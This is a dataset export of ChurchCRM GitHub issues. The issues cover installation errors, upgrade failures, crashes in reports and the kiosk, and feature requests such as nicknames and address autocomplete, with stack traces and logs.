issue_owner_repo listlengths 2 2 | issue_body stringlengths 0 261k ⌀ | issue_title stringlengths 1 925 | issue_comments_url stringlengths 56 81 | issue_comments_count int64 0 2.5k | issue_created_at stringlengths 20 20 | issue_updated_at stringlengths 20 20 | issue_html_url stringlengths 37 62 | issue_github_id int64 387k 2.46B | issue_number int64 1 127k |
|---|---|---|---|---|---|---|---|---|---|
[
"ChurchCRM",
"CRM"
] | **Description**
<!-- A clear and concise description of what the bug is. -->
- ChurchCRM version: 5.2.2
- PHP version is the server running: 8.1
- DB Server and Version are you running:
**Steps To Reproduce**
1. Go to Group View
2. Click on Edit this Group
3. Click on Group-Specific Properties
4. Add a new field with the custom drop-down list
5. Edit the list by deleting or rearranging the list
6. Error: Redirects to homepage
**Expected behavior**
<!-- A clear and concise description of what you expected to happen. -->
**Screenshots and/or logs**
<!-- If applicable, add screenshots or share logs help explain your problem. -->

**Debugging Steps**
<!-- If you need help debugging, please refer to the wiki for guidance: https://github.com/ChurchCRM/CRM/wiki/Logging-and-Diagnostics. -->
* What has been done to debug the issue so far?
* Have you looked at the browser's developer tools to see if an error is thrown / the network request failed?
None
* Are there any associated error logs on the backend that get emitted when you attempt to do this action?
`[2023-11-14T23:40:38.078555+00:00] defaultLogger.INFO: Not starting a backup job. Last backup run: 20231114-232858. [] {"url":"/api/background/timerjobs","remote_ip":"172.69.194.197","correlation_id":"65540576132de"}
`
**Desktop (please complete the following information):**
- OS: [e.g. iOS]
- Browser [e.g. chrome, safari]
- Version [e.g. 22]
**Smartphone (please complete the following information):**
- Device: [e.g. iPhone6]
- OS: [e.g. iOS8.1]
- Browser [e.g. stock browser, safari]
- Version [e.g. 22]
**Additional context**
<!-- Add any other context about the problem here. -->
| Bug: Unable to delete or move item in | https://api.github.com/repos/ChurchCRM/CRM/issues/6669/comments | 4 | 2023-11-14T23:26:39Z | 2023-11-16T04:04:55Z | https://github.com/ChurchCRM/CRM/issues/6669 | 1,993,747,234 | 6,669 |
[
"ChurchCRM",
"CRM"
] | **Description**
I overwrite the v5.1.1 with v5.2.1 files but when I click on the **Upgrade Database** button it does nothing.
- ChurchCRM version: 5.1.1
- PHP version is the server running: 8.1
- DB Server and Version are you running:
Log
"172.69.194.127 - - [13/Nov/2023:12:12:16 +0000] "GET / HTTP/2" 302 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Edg/119.0.0.0""
"172.69.194.127 - - [13/Nov/2023:12:12:16 +0000] "GET /SystemDBUpdate.php HTTP/2" 200 1212 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Edg/119.0.0.0""
"172.69.194.127 - - [13/Nov/2023:12:12:24 +0000] "GET /SystemDBUpdate.php?upgrade=true HTTP/2" 302 0 "https://ccrm.domain.ng/SystemDBUpdate.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Edg/119.0.0.0""
"172.69.194.127 - - [13/Nov/2023:12:12:24 +0000] "GET /Menu.php HTTP/2" 302 0 "https://ccrm.domain.ng/SystemDBUpdate.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Edg/119.0.0.0""
"172.69.194.127 - - [13/Nov/2023:12:12:24 +0000] "GET /SystemDBUpdate.php HTTP/2" 200 1211 "https://ccrm.domain.ng/SystemDBUpdate.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Edg/119.0.0.0""

| Bug: Unable to Upgrade | https://api.github.com/repos/ChurchCRM/CRM/issues/6663/comments | 8 | 2023-11-13T12:16:48Z | 2023-12-31T02:08:35Z | https://github.com/ChurchCRM/CRM/issues/6663 | 1,990,539,200 | 6,663 |
[
"ChurchCRM",
"CRM"
] | **Is your feature request related to a problem? Please describe.**
A clear and concise description of what the problem is. Ex. I'm always frustrated when [...]
Entering address information on the Family Editor can be frustrating.
**Describe the solution you'd like**
A clear and concise description of what you want to happen.
It would be great if the Address field was an autocompleted backed by a maps-API (like Google). That way, if the full address is provided, the frontend could parse it and split it into their respective fields. Likewise, the latitude/longitude could be automatically processed and provided instead of manually entering this data.
**Describe alternatives you've considered**
A clear and concise description of any alternative solutions or features you've considered.
Dealing with it, which is possible but can be annoying when entering multiple entries.
**Additional context**
Page in question:
<img width="1018" alt="image" src="https://github.com/ChurchCRM/CRM/assets/5031018/9209bcb7-013e-43c0-b2d7-a636b9f207fe">
| Feature request: Autocomplete for address fields based on maps api | https://api.github.com/repos/ChurchCRM/CRM/issues/6659/comments | 2 | 2023-11-12T01:21:24Z | 2024-08-10T02:21:16Z | https://github.com/ChurchCRM/CRM/issues/6659 | 1,989,186,453 | 6,659 |
[
"ChurchCRM",
"CRM"
] | **Description**
A clear and concise description of what the bug is.
- ChurchCRM version: 5.2.0
- PHP version is the server running: 8.2.11
- DB Server and Version are you running: mysql
**To Reproduce**
Steps to reproduce the behavior:
1. Install ChurchCRM
2. Add new user, and create family from user
3. Go to Active Family List
4. Edit Family
5. Go to Active Family List
6. See how country has been replaced with country code
**Expected behavior**
A clear and concise description of what you expected to happen.
Always use the Country instead of the Country code.
**Screenshots**
If applicable, add screenshots to help explain your problem.
<img width="295" alt="image" src="https://github.com/ChurchCRM/CRM/assets/5031018/c90e6f73-0d7a-4151-9247-ca3daad9253d">
| Bug: Editing Family erroneously updates country information | https://api.github.com/repos/ChurchCRM/CRM/issues/6657/comments | 13 | 2023-11-11T21:13:23Z | 2024-08-10T02:21:17Z | https://github.com/ChurchCRM/CRM/issues/6657 | 1,989,120,641 | 6,657 |
[
"ChurchCRM",
"CRM"
] | **Is your feature request related to a problem? Please describe.**
On a fresh install, I just set up the church information. When creating new People, the default country was set to Afghanistan instead of the Church's country.
**Describe the solution you'd like**
A clear and concise description of what you want to happen.
In order to make the application easier to approach, we should default to the Church's state/country if nothing is initially provided.
**Describe alternatives you've considered**
A clear and concise description of any alternative solutions or features you've considered.
Just actually configuring it, it's possible but leaving this open leaves room for error.
| Feature request: Default state/country for Person should be set to Church's state/country if not configured | https://api.github.com/repos/ChurchCRM/CRM/issues/6656/comments | 8 | 2023-11-11T21:09:07Z | 2024-08-10T02:21:18Z | https://github.com/ChurchCRM/CRM/issues/6656 | 1,989,119,584 | 6,656 |
[
"ChurchCRM",
"CRM"
] | **Is your feature request related to a problem? Please describe.**
A clear and concise description of what the problem is. Ex. I'm always frustrated when [...]
In my church, many members go by their nickname as opposed to their legal name.
**Describe the solution you'd like**
A clear and concise description of what you want to happen.
We should extend the Person class and table to support a nullable nickname for easier identification.
**Describe alternatives you've considered**
A clear and concise description of any alternative solutions or features you've considered.
We could set the first name to the nickname or have both first and nick name in the First name record, but then it could get confusing when cross-referencing against documents with the person's legal name.
**Additional context**
Probably should be added somewhere here:
<img width="1020" alt="image" src="https://github.com/ChurchCRM/CRM/assets/5031018/e499ef2f-f6ef-415b-af24-0f95252f4c1f">
| Feature request: Add optional nickname to Person | https://api.github.com/repos/ChurchCRM/CRM/issues/6651/comments | 7 | 2023-11-11T19:08:41Z | 2024-06-27T05:50:49Z | https://github.com/ChurchCRM/CRM/issues/6651 | 1,989,084,711 | 6,651 |
[
"ChurchCRM",
"CRM"
] | null | Migrate hardcoded states dropdown (src/Include/StateDropDown.php) to use States object (src/ChurchCRM/data/States.php) | https://api.github.com/repos/ChurchCRM/CRM/issues/6644/comments | 3 | 2023-11-11T01:06:50Z | 2024-02-12T21:57:55Z | https://github.com/ChurchCRM/CRM/issues/6644 | 1,988,623,871 | 6,644 |
[
"ChurchCRM",
"CRM"
] | It looks like this is only used in https://github.com/ChurchCRM/CRM/blob/master/src/ChurchCRM/Emails/BaseEmail.php so this will need to be updated, as well as the templates to match the other engine's syntax. | Replace "mustache/mustache" with a better-maintained templating library, like "twigphp/twig" | https://api.github.com/repos/ChurchCRM/CRM/issues/6643/comments | 4 | 2023-11-11T00:58:22Z | 2024-05-01T04:27:56Z | https://github.com/ChurchCRM/CRM/issues/6643 | 1,988,620,369 | 6,643 |
[
"ChurchCRM",
"CRM"
] | **Description**
Birthday and Gender Chart for Class not displaying
- ChurchCRM version: 5.1.1
- PHP version is the server running: 8.1
- DB Server and Version are you running:
| Bug: Birthday and Gender Chart for Class not displaying | https://api.github.com/repos/ChurchCRM/CRM/issues/6640/comments | 7 | 2023-11-10T18:36:46Z | 2023-11-17T05:25:12Z | https://github.com/ChurchCRM/CRM/issues/6640 | 1,988,159,760 | 6,640 |
[
"ChurchCRM",
"CRM"
] | **Description**
Aside from the default "Member" role, the add new button does not add a new role.
- ChurchCRM version: 5.1.1
- PHP version is the server running: 8.1
- DB Server and Version are you running: | Bug: Unable to create new group role | https://api.github.com/repos/ChurchCRM/CRM/issues/6639/comments | 6 | 2023-11-10T18:35:45Z | 2023-11-14T19:01:21Z | https://github.com/ChurchCRM/CRM/issues/6639 | 1,988,158,729 | 6,639 |
[
"ChurchCRM",
"CRM"
] | - ChurchCRM version: 5.1.1
- PHP version is the server running: 8.1
- DB Server and Version are you running:
I get the following error when I click CSV Import
`Fatal error: Uncaught Error: Undefined constant ChurchCRM\Family::TABLE_MAP in /home/ccrm.bluespace.ng/public_html/vendor/propel/propel/src/Propel/Runtime/ActiveQuery/BaseModelCriteria.php:173 Stack trace: #0 /home/ccrm.bluespace.ng/public_html/vendor/propel/propel/src/Propel/Runtime/ActiveQuery/BaseModelCriteria.php(173): constant() #1 /home/ccrm.bluespace.ng/public_html/vendor/propel/propel/src/Propel/Runtime/ActiveQuery/BaseModelCriteria.php(70): Propel\Runtime\ActiveQuery\BaseModelCriteria->setModelName() #2 /home/ccrm.bluespace.ng/public_html/ChurchCRM/model/ChurchCRM/Base/FamilyQuery.php(230): Propel\Runtime\ActiveQuery\BaseModelCriteria->__construct() #3 /home/ccrm.bluespace.ng/public_html/ChurchCRM/model/ChurchCRM/Base/FamilyQuery.php(246): ChurchCRM\Base\FamilyQuery->__construct() #4 /home/ccrm.bluespace.ng/public_html/ChurchCRM/tasks/UpdateFamilyCoordinatesTask.php(14): ChurchCRM\Base\FamilyQuery::create() #5 /home/ccrm.bluespace.ng/public_html/ChurchCRM/Service/TaskService.php(50): ChurchCRM\Tasks\UpdateFamilyCoordinatesTask->__construct() #6 /home/ccrm.bluespace.ng/public_html/Include/Header.php(11): ChurchCRM\Service\TaskService->__construct() #7 /home/ccrm.bluespace.ng/public_html/CSVImport.php(116): require('...') #8 {main} thrown in /home/ccrm.bluespace.ng/public_html/vendor/propel/propel/src/Propel/Runtime/ActiveQuery/BaseModelCriteria.php on line 173` | Bug: CSV Import Error | https://api.github.com/repos/ChurchCRM/CRM/issues/6637/comments | 0 | 2023-11-10T14:45:16Z | 2023-11-11T04:33:49Z | https://github.com/ChurchCRM/CRM/issues/6637 | 1,987,767,425 | 6,637 |
[
"ChurchCRM",
"CRM"
] | Sorry, I am a Chinese user.
If there is any inappropriate expression, please forgive me.
**Description**
A clear and concise description of what the bug is.
- ChurchCRM version: 5.0.2
- PHP version is the server running: 8.1.17
- DB Server and Version are you running: 10.4.21-MariaDB
**To Reproduce**
Steps to reproduce the behavior:
An error occurred while I was installing.
Deprecated: Return type of Propel\Runtime\ActiveQuery\BaseModelCriteria::getIterator() should either be compatible with IteratorAggregate::getIterator(): Traversable, or the #[\ReturnTypeWillChange] attribute should be used to temporarily suppress the notice in C:\xampp\htdocs\prm\vendor\propel\propel\src\Propel\Runtime\ActiveQuery\BaseModelCriteria.php on line 261
Deprecated: Return type of ChurchCRM\data\Country::jsonSerialize() should either be compatible with JsonSerializable::jsonSerialize(): mixed, or the #[\ReturnTypeWillChange] attribute should be used to temporarily suppress the notice in C:\xampp\htdocs\prm\ChurchCRM\data\Country.php on line 28
Deprecated: Return type of Slim\Collection::offsetExists($key) should either be compatible with ArrayAccess::offsetExists(mixed $offset): bool, or the #[\ReturnTypeWillChange] attribute should be used to temporarily suppress the notice in C:\xampp\htdocs\prm\vendor\slim\slim\Slim\Collection.php on line 112
Deprecated: Return type of Slim\Collection::offsetGet($key) should either be compatible with ArrayAccess::offsetGet(mixed $offset): mixed, or the #[\ReturnTypeWillChange] attribute should be used to temporarily suppress the notice in C:\xampp\htdocs\prm\vendor\slim\slim\Slim\Collection.php on line 124
Deprecated: Return type of Slim\Collection::offsetSet($key, $value) should either be compatible with ArrayAccess::offsetSet(mixed $offset, mixed $value): void, or the #[\ReturnTypeWillChange] attribute should be used to temporarily suppress the notice in C:\xampp\htdocs\prm\vendor\slim\slim\Slim\Collection.php on line 135
Deprecated: Return type of Slim\Collection::offsetUnset($key) should either be compatible with ArrayAccess::offsetUnset(mixed $offset): void, or the #[\ReturnTypeWillChange] attribute should be used to temporarily suppress the notice in C:\xampp\htdocs\prm\vendor\slim\slim\Slim\Collection.php on line 145
Deprecated: Return type of Slim\Collection::count() should either be compatible with Countable::count(): int, or the #[\ReturnTypeWillChange] attribute should be used to temporarily suppress the notice in C:\xampp\htdocs\prm\vendor\slim\slim\Slim\Collection.php on line 155
Deprecated: Return type of Slim\Collection::getIterator() should either be compatible with IteratorAggregate::getIterator(): Traversable, or the #[\ReturnTypeWillChange] attribute should be used to temporarily suppress the notice in C:\xampp\htdocs\prm\vendor\slim\slim\Slim\Collection.php on line 165
Deprecated: Return type of Slim\Collection::offsetExists($key) should either be compatible with ArrayAccess::offsetExists(mixed $offset): bool, or the #[\ReturnTypeWillChange] attribute should be used to temporarily suppress the notice in C:\xampp\htdocs\prm\vendor\slim\slim\Slim\Collection.php on line 112
Deprecated: Return type of Slim\Collection::offsetGet($key) should either be compatible with ArrayAccess::offsetGet(mixed $offset): mixed, or the #[\ReturnTypeWillChange] attribute should be used to temporarily suppress the notice in C:\xampp\htdocs\prm\vendor\slim\slim\Slim\Collection.php on line 124
Deprecated: Return type of Slim\Collection::offsetSet($key, $value) should either be compatible with ArrayAccess::offsetSet(mixed $offset, mixed $value): void, or the #[\ReturnTypeWillChange] attribute should be used to temporarily suppress the notice in C:\xampp\htdocs\prm\vendor\slim\slim\Slim\Collection.php on line 135
Deprecated: Return type of Slim\Collection::offsetUnset($key) should either be compatible with ArrayAccess::offsetUnset(mixed $offset): void, or the #[\ReturnTypeWillChange] attribute should be used to temporarily suppress the notice in C:\xampp\htdocs\prm\vendor\slim\slim\Slim\Collection.php on line 145
Deprecated: Return type of Slim\Collection::count() should either be compatible with Countable::count(): int, or the #[\ReturnTypeWillChange] attribute should be used to temporarily suppress the notice in C:\xampp\htdocs\prm\vendor\slim\slim\Slim\Collection.php on line 155
Deprecated: Return type of Slim\Collection::getIterator() should either be compatible with IteratorAggregate::getIterator(): Traversable, or the #[\ReturnTypeWillChange] attribute should be used to temporarily suppress the notice in C:\xampp\htdocs\prm\vendor\slim\slim\Slim\Collection.php on line 165
Fatal error: Uncaught RuntimeException: Unexpected data in output buffer. Maybe you have characters before an opening <?php tag? in C:\xampp\htdocs\prm\vendor\slim\slim\Slim\App.php:621 Stack trace: #0 C:\xampp\htdocs\prm\vendor\slim\slim\Slim\App.php(317): Slim\App->finalize(Object(Slim\Http\Response)) #1 C:\xampp\htdocs\prm\setup\index.php(29): Slim\App->run() #2 {main} thrown in C:\xampp\htdocs\prm\vendor\slim\slim\Slim\App.php on line 621
**Additional context**
Add any other context about the problem here.
| Bug: Installation issues. | https://api.github.com/repos/ChurchCRM/CRM/issues/6634/comments | 9 | 2023-11-09T03:01:35Z | 2023-11-11T00:55:05Z | https://github.com/ChurchCRM/CRM/issues/6634 | 1,984,731,573 | 6,634 |
[
"ChurchCRM",
"CRM"
] | **Description**
- ChurchCRM version: 5.1.1
- PHP version is the server running: 8.2
- DB Server and Version are you running: Not Relevant
**To Reproduce**
Steps to reproduce the behavior:
1. Make new event
2. Go to calendar
3. Edit newly created event
4. Set start date to after end date
4. See how it erroneously succeeds
**Expected behavior**
Error message saying something like "Failed to update event: start date must be before end date"
**Screenshots**
<img width="503" alt="image" src="https://github.com/ChurchCRM/CRM/assets/5031018/3fdef842-f58e-412d-b882-4b7d44060b71">
**Desktop (please complete the following information):**
- OS: macOS
- Browser: safari, firefox, chrome (again, not relevant)
| Bug: Editing event should provide a validation error if start date is after the end date | https://api.github.com/repos/ChurchCRM/CRM/issues/6629/comments | 6 | 2023-11-07T02:59:37Z | 2024-06-27T05:50:38Z | https://github.com/ChurchCRM/CRM/issues/6629 | 1,980,444,780 | 6,629 |
[
"ChurchCRM",
"CRM"
] | **Description**
Getting a 500 error when going to the kiosk sub directory.
ChurchCRM version: 5.1.0
PHP version is the server running: 8.2
DB Server and Version are you running: 10.11.2-MariaDB-1:10.11.2+maria~ubu2204
Web Server: Apache 2
**To Reproduce**
Steps to reproduce the behavior:
1. Go to ' _ WEBSITE _ /kiosk'
**Expected behavior**
kiosk website should load
Desktop (please complete the following information):
OS: [e.g. iOS] Windows 11
Browser [e.g. chrome, safari] Multiple
Version [e.g. 22]
**Additional context**
Getting a 500 error when going to the kiosk sub directory.
Error shown on page is :
Fatal error: Uncaught Error: Class "App" not found in /home/###/kiosk/index.php:11 Stack trace: #0 {main} thrown in /home/###/kiosk/index.php on line 11
Error in log file is :
[Mon Nov 06 14:16:29.552408 2023] [proxy_fcgi:error] [pid 395541:tid 139779526071872] [client xxx.xx.xxx.x:0] AH01071: Got error 'PHP message: PHP Warning: Undefined variable $app in /home/###kiosk/routes/kiosk.php on line 9; PHP message: PHP Fatal error: Uncaught Error: Call to a member function get() on null in /home/###/kiosk/routes/kiosk.php:9\nStack trace:\n#0 {main}\n thrown in /home/###/kiosk/routes/kiosk.php on line 9'
| Kiosk Manager / Kiosk page | https://api.github.com/repos/ChurchCRM/CRM/issues/6628/comments | 1 | 2023-11-06T17:15:03Z | 2023-11-06T18:38:28Z | https://github.com/ChurchCRM/CRM/issues/6628 | 1,979,650,220 | 6,628 |
[
"ChurchCRM",
"CRM"
] | **Describe the bug**
Type: Error
Message: Call to undefined function ChurchCRM\Service\apache_get_modules()
File: ################################################/ChurchCRM/Service/AppIntegrityService.php
Line: 192
- ChurchCRM version: 5.1
- PHP version is the server running: 8.2
- DB Server and Version are you running:
**To Reproduce**
Steps to reproduce the behavior:
1. Go to 'Main Page'
**Expected behavior**
The Dashboard should load
**Desktop (please complete the following information):**
- OS: [e.g. iOS] Windows 11
- Browser [e.g. chrome, safari] Multiple
- Version [e.g. 22]
**Additional context**
Prevents Installation of v 5.1 | AppIntegrityService.php | https://api.github.com/repos/ChurchCRM/CRM/issues/6621/comments | 10 | 2023-11-05T19:39:13Z | 2023-11-07T04:00:00Z | https://github.com/ChurchCRM/CRM/issues/6621 | 1,977,931,366 | 6,621 |
[
"ChurchCRM",
"CRM"
] | **Describe the bug**
500 when running Ta Report
- ChurchCRM version: 5.0.5
- PHP version is the server running: 8.1
**To Reproduce**
Steps to reproduce the behavior:
1. Go to '/FinancialReports.php)'
2. Click on 'Tax Report'
3. Click Run
4. See error
```
#3 {main}
thrown in /var/www/html/vendor/setasign/fpdf/fpdf.php on line 267
[04-Nov-2023 13:39:23 America/Detroit] PHP Fatal error: Uncaught Exception: FPDF error: No page has been added yet in /var/www/html/vendor/setasign/fpdf/fpdf.php:267
Stack trace:
#0 /var/www/html/vendor/setasign/fpdf/fpdf.php(1463): FPDF->Error()
#1 /var/www/html/vendor/setasign/fpdf/fpdf.php(648): FPDF->_out()
#2 /var/www/html/Reports/TaxReport.php(423): FPDF->Cell()
#3 {main}
thrown in /var/www/html/vendor/setasign/fpdf/fpdf.php on line 267
[04-Nov-2023 13:39:25 America/Detroit] PHP Fatal error: Uncaught Exception: FPDF error: No page has been added yet in /var/www/html/vendor/setasign/fpdf/fpdf.php:267
Stack trace:
#0 /var/www/html/vendor/setasign/fpdf/fpdf.php(1463): FPDF->Error()
#1 /var/www/html/vendor/setasign/fpdf/fpdf.php(648): FPDF->_out()
#2 /var/www/html/Reports/TaxReport.php(423): FPDF->Cell()
#3 {main}
thrown in /var/www/html/vendor/setasign/fpdf/fpdf.php on line 267
[04-Nov-2023 13:39:38 America/Detroit] PHP Fatal error: Uncaught ArgumentCountError: Too few arguments to function ChurchCRM\Reports\PdfTaxReport::finishPage(), 1 passed in /var/www/html/Reports/TaxReport.php on line 346 and exactly 9 expected in /var/www/html/Reports/TaxReport.php:222
Stack trace:
#0 /var/www/html/Reports/TaxReport.php(346): ChurchCRM\Reports\PdfTaxReport->finishPage()
#1 {main}
thrown in /var/www/html/Reports/TaxReport.php on line 222
``` | Error running Tax Report 500 | https://api.github.com/repos/ChurchCRM/CRM/issues/6615/comments | 2 | 2023-11-04T17:46:56Z | 2023-11-24T16:28:15Z | https://github.com/ChurchCRM/CRM/issues/6615 | 1,977,444,505 | 6,615 |
[
"ChurchCRM",
"CRM"
] | A fresh installation.
- ChurchCRM version: 5.0.5
- PHP version is the server running: 8.1
- DB Server and Version are you running:
```
Deprecated: Return type of Propel\Runtime\ActiveQuery\BaseModelCriteria::getIterator() should either be compatible with IteratorAggregate::getIterator(): Traversable, or the #[\ReturnTypeWillChange] attribute should be used to temporarily suppress the notice in /home/ccrm.bluespace.ng/public_html/vendor/propel/propel/src/Propel/Runtime/ActiveQuery/BaseModelCriteria.php on line 261
Deprecated: Return type of Slim\Collection::offsetExists($key) should either be compatible with ArrayAccess::offsetExists(mixed $offset): bool, or the #[\ReturnTypeWillChange] attribute should be used to temporarily suppress the notice in /home/ccrm.bluespace.ng/public_html/vendor/slim/slim/Slim/Collection.php on line 112
Deprecated: Return type of Slim\Collection::offsetGet($key) should either be compatible with ArrayAccess::offsetGet(mixed $offset): mixed, or the #[\ReturnTypeWillChange] attribute should be used to temporarily suppress the notice in /home/ccrm.bluespace.ng/public_html/vendor/slim/slim/Slim/Collection.php on line 124
Deprecated: Return type of Slim\Collection::offsetSet($key, $value) should either be compatible with ArrayAccess::offsetSet(mixed $offset, mixed $value): void, or the #[\ReturnTypeWillChange] attribute should be used to temporarily suppress the notice in /home/ccrm.bluespace.ng/public_html/vendor/slim/slim/Slim/Collection.php on line 135
Deprecated: Return type of Slim\Collection::offsetUnset($key) should either be compatible with ArrayAccess::offsetUnset(mixed $offset): void, or the #[\ReturnTypeWillChange] attribute should be used to temporarily suppress the notice in /home/ccrm.bluespace.ng/public_html/vendor/slim/slim/Slim/Collection.php on line 145
Deprecated: Return type of Slim\Collection::count() should either be compatible with Countable::count(): int, or the #[\ReturnTypeWillChange] attribute should be used to temporarily suppress the notice in /home/ccrm.bluespace.ng/public_html/vendor/slim/slim/Slim/Collection.php on line 155
Deprecated: Return type of Slim\Collection::getIterator() should either be compatible with IteratorAggregate::getIterator(): Traversable, or the #[\ReturnTypeWillChange] attribute should be used to temporarily suppress the notice in /home/ccrm.bluespace.ng/public_html/vendor/slim/slim/Slim/Collection.php on line 165
Deprecated: Return type of Slim\Collection::offsetExists($key) should either be compatible with ArrayAccess::offsetExists(mixed $offset): bool, or the #[\ReturnTypeWillChange] attribute should be used to temporarily suppress the notice in /home/ccrm.bluespace.ng/public_html/vendor/slim/slim/Slim/Collection.php on line 112
Deprecated: Return type of Slim\Collection::offsetGet($key) should either be compatible with ArrayAccess::offsetGet(mixed $offset): mixed, or the #[\ReturnTypeWillChange] attribute should be used to temporarily suppress the notice in /home/ccrm.bluespace.ng/public_html/vendor/slim/slim/Slim/Collection.php on line 124
Deprecated: Return type of Slim\Collection::offsetSet($key, $value) should either be compatible with ArrayAccess::offsetSet(mixed $offset, mixed $value): void, or the #[\ReturnTypeWillChange] attribute should be used to temporarily suppress the notice in /home/ccrm.bluespace.ng/public_html/vendor/slim/slim/Slim/Collection.php on line 135
Deprecated: Return type of Slim\Collection::offsetUnset($key) should either be compatible with ArrayAccess::offsetUnset(mixed $offset): void, or the #[\ReturnTypeWillChange] attribute should be used to temporarily suppress the notice in /home/ccrm.bluespace.ng/public_html/vendor/slim/slim/Slim/Collection.php on line 145
Deprecated: Return type of Slim\Collection::count() should either be compatible with Countable::count(): int, or the #[\ReturnTypeWillChange] attribute should be used to temporarily suppress the notice in /home/ccrm.bluespace.ng/public_html/vendor/slim/slim/Slim/Collection.php on line 155
Deprecated: Return type of Slim\Collection::getIterator() should either be compatible with IteratorAggregate::getIterator(): Traversable, or the #[\ReturnTypeWillChange] attribute should be used to temporarily suppress the notice in /home/ccrm.bluespace.ng/public_html/vendor/slim/slim/Slim/Collection.php on line 165
Fatal error: Uncaught RuntimeException: Unexpected data in output buffer. Maybe you have characters before an opening <?php tag? in /home/ccrm.bluespace.ng/public_html/vendor/slim/slim/Slim/App.php:621 Stack trace: #0 /home/ccrm.bluespace.ng/public_html/vendor/slim/slim/Slim/App.php(317): Slim\App->finalize() #1 /home/ccrm.bluespace.ng/public_html/setup/index.php(29): Slim\App->run() #2 {main} thrown in /home/ccrm.bluespace.ng/public_html/vendor/slim/slim/Slim/App.php on line 621
``` | Can't install 5.0.5 | https://api.github.com/repos/ChurchCRM/CRM/issues/6610/comments | 7 | 2023-11-03T15:00:27Z | 2023-11-10T14:58:38Z | https://github.com/ChurchCRM/CRM/issues/6610 | 1,976,390,504 | 6,610 |
[
"ChurchCRM",
"CRM"
] | **If you have the ChurchCRM software running, please file an issue using the _Report an issue_ in the help menu.**
#### On what page in the application did you find this issue?
http://localhost/v2/family/2
#### On what type of server is this running? Dedicated / Shared hosting? Linux / Windows?
windows 11
#### What browser (and version) are you running?
chrome and brave
#### What version of PHP is the server running?
PHP version: 8.1.17
#### What version of SQL Server are you running?
Database client version: libmysql - mysqlnd 8.1.17
#### What version of ChurchCRM are you running?
5.0.4
Can not add or edit any field and no profile photos.

| Slim Application Error | https://api.github.com/repos/ChurchCRM/CRM/issues/6602/comments | 5 | 2023-10-31T17:29:24Z | 2023-11-03T21:20:36Z | https://github.com/ChurchCRM/CRM/issues/6602 | 1,970,952,976 | 6,602 |
[
"ChurchCRM",
"CRM"
] | **If you have the ChurchCRM software running, please file an issue using the _Report an issue_ in the help menu.**
#### On what page in the application did you find this issue?
**CheckIn for an event**
#### On what type of server is this running? Dedicated / Shared hosting? Linux / Windows?
**shared hosting --> dreamhost**
#### What browser (and version) are you running?
**Chrome Version 118.0.5993.118 (Official Build) (64-bit)**
#### What version of PHP is the server running?
**8.1**
#### What version of SQL Server are you running?
**MySql version 5.2.1**
#### What version of ChurchCRM are you running?
**5.0.1**
I am trying to checkin my members but when I go to check them in I can only enter 1 name and then the page freezes and the drop down for names and checking in no longer works. It's like the script is not refreshing after checking in 1 user. | Checkin freezing after checking in 1 user | https://api.github.com/repos/ChurchCRM/CRM/issues/6595/comments | 7 | 2023-10-29T17:48:25Z | 2023-11-05T03:52:30Z | https://github.com/ChurchCRM/CRM/issues/6595 | 1,967,091,127 | 6,595 |
[
"ChurchCRM",
"CRM"
] | The zip file containing the 503 release is a zip of a zip of a folder
It should just be a zip of a folder
| 5.0.3 double zipped | https://api.github.com/repos/ChurchCRM/CRM/issues/6591/comments | 4 | 2023-10-29T09:10:42Z | 2023-10-29T20:43:15Z | https://github.com/ChurchCRM/CRM/issues/6591 | 1,966,907,235 | 6,591 |
[
"ChurchCRM",
"CRM"
] | when you visit - https://www.intelligentsearch.com/Hosted/User/
you get
> This is a reminder that, effective January 5, 2022 Experian Data Quality will no longer offer the Intelligent Search Technology ecommerce portal for the services listed below.
| intelligentsearch was shutdown | https://api.github.com/repos/ChurchCRM/CRM/issues/6584/comments | 0 | 2023-10-28T22:56:19Z | 2023-10-28T23:41:07Z | https://github.com/ChurchCRM/CRM/issues/6584 | 1,966,764,073 | 6,584 |
[
"ChurchCRM",
"CRM"
] | #### On what page in the application did you find this issue?
v2/user/1
#### On what type of server is this running? Dedicated / Shared hosting? Linux / Windows?
dev build
#### What version of PHP is the server running?
8.3
Looks like adminlte changed the way the skin looks from a single style to Navbar Variants.
See demo.js for the styles.
| User Style does not work | https://api.github.com/repos/ChurchCRM/CRM/issues/6582/comments | 10 | 2023-10-28T18:40:39Z | 2024-06-27T02:11:23Z | https://github.com/ChurchCRM/CRM/issues/6582 | 1,966,700,226 | 6,582 |
[
"ChurchCRM",
"CRM"
] | **If you have the ChurchCRM software running, please file an issue using the _Report an issue_ in the help menu.**
#### On what page in the application did you find this issue?
- On the installation page
#### On what type of server is this running? Dedicated / Shared hosting? Linux / Windows?
- Laptop with windows 11
#### What browser (and version) are you running?
Brave and chrome
#### What version of PHP is the server running?
Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.2.4
#### What version of SQL Server are you running?
Database client version: libmysql - mysqlnd 8.2.4
#### What version of ChurchCRM are you running?
5.0.2

| Cannot Install ChurchCRM 5.0.2 | https://api.github.com/repos/ChurchCRM/CRM/issues/6570/comments | 3 | 2023-10-26T10:07:45Z | 2023-10-31T17:24:54Z | https://github.com/ChurchCRM/CRM/issues/6570 | 1,963,166,801 | 6,570 |
[
"ChurchCRM",
"CRM"
] | #### On what page in the application did you find this issue?
Home
#### On what type of server is this running? Dedicated / Shared hosting? Linux / Windows?
Dedicated Linux Hosting (Linux Mint 21.2)
#### What browser (and version) are you running?
Firefox 119.0
#### What version of PHP is the server running?
PHP 8.1.2-1ubuntu2.14
#### What version of SQL Server are you running?
MySQL 8.0.35
#### What version of ChurchCRM are you running?
5.0.2
Unzipped 5.0.2 and created the appropriate apache config file and enabled it.
